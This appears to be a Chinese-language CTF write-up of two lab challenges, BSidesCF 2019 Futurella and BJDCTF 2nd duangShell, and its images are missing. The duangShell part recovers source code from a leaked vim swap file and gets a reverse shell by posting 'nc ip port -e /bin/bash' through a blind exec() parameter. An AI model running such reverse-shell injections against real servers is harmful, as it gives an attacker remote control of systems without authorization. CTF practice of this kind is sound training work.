文章目录
- [BSidesCF 2019]Futurella
- [BJDCTF 2nd]duangShell
-
- 反弹姿势1(未成功)
- 反弹姿势2
[BSidesCF 2019]Futurella
好久没看过这么简单的题目了,哇哇哇
整了个火星文,看不懂查看源代码

[BJDCTF 2nd]duangShell
点进去发现是swp源码泄露

利用vim -r index.php.swp恢复文件

这里我知道了exec函数与system类似但是没有回显,所以我传入的参数girl_friend=print_r(scandir(dirname(__FILE__)))会没有显示
看了别人的wp,发现我们只能用反弹shell的方法了,根据提示

由于这题的环境靶机无法访问外网,所以需要一个内网靶机来做,这里就直接用了题目中推荐的Basic中的Linux Labs,由于这台靶机已经安装了lamp,已指出http服务,利用xshell连接主机


反弹姿势1(未成功)


开启

反弹shell

不知道为啥通不了迷惑???
反弹姿势2
post参数:nc ip port -e /bin/bash


这个靶机真垃圾





